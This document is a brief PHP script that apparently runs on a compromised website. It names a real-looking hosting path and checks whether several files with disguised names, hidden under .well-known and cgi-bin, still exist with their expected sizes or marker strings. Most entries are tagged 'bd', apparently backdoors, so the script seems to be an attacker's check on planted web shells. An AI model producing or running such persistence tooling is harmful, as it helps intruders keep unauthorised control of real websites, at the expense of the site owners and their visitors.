<?php   $r = '/home/esg95nx/public_html/star-chefacademy.com'; $x = ["/.well-known/acme-challenge/topics_directory.php"=>"bd@@141983014@@1592",
"/formatter.php"=>"bd@@141983090@@467",
"/.well-known/acme-challenge/topics_directory.php"=>"bd@@142075095@@77",
"/formatter.php"=>"bd@@142075112@@2",
"/.well-known/pki-validation/viewforum.php"=>"bd@@142075130@@X-Dns-Prefetch-Control",
"/.well-known/Index.php"=>"bd@@141982883@@33",
"/cgi-bin/register_result.php"=>"bd@@142075147@@536",
"/.well-known/Index.php"=>"bd@@141982988@@24",
"/.well-known/pki-validation/viewforum.php"=>"ui@@293139@@66"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 